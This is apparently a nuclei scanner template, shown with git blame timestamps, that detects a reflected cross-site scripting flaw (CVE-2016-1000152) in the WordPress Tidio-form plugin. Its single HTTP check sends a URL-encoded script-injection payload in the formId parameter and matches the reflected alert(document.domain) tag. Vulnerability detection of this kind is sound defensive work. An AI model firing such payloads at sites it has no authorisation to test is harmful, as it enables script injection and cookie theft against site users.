nuclei-templates/http/cves/2016/CVE-2016-1000152.yaml

47 lines
1.5 KiB
YAML
Raw Normal View History

2021-07-21 22:57:54 +00:00
id: CVE-2016-1000152
info:
name: WordPress Tidio-form <=1.0 - Cross-Site Scripting
2021-07-21 22:57:54 +00:00
author: daffainfo
severity: medium
description: WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=799
- https://wordpress.org/plugins/tidio-form
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000152
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000152
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00249
cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.6202
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
framework: wordpress
vendor: tidio-form_project
product: tidio-form
tags: cve,cve2016,wordpress,xss,wp-plugin
2021-07-21 22:57:54 +00:00
http:
2021-07-21 22:57:54 +00:00
- method: GET
path:
2021-07-22 12:23:22 +00:00
- "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-21 22:57:54 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-07-21 22:57:54 +00:00
words:
2021-07-22 12:23:22 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-21 22:57:54 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200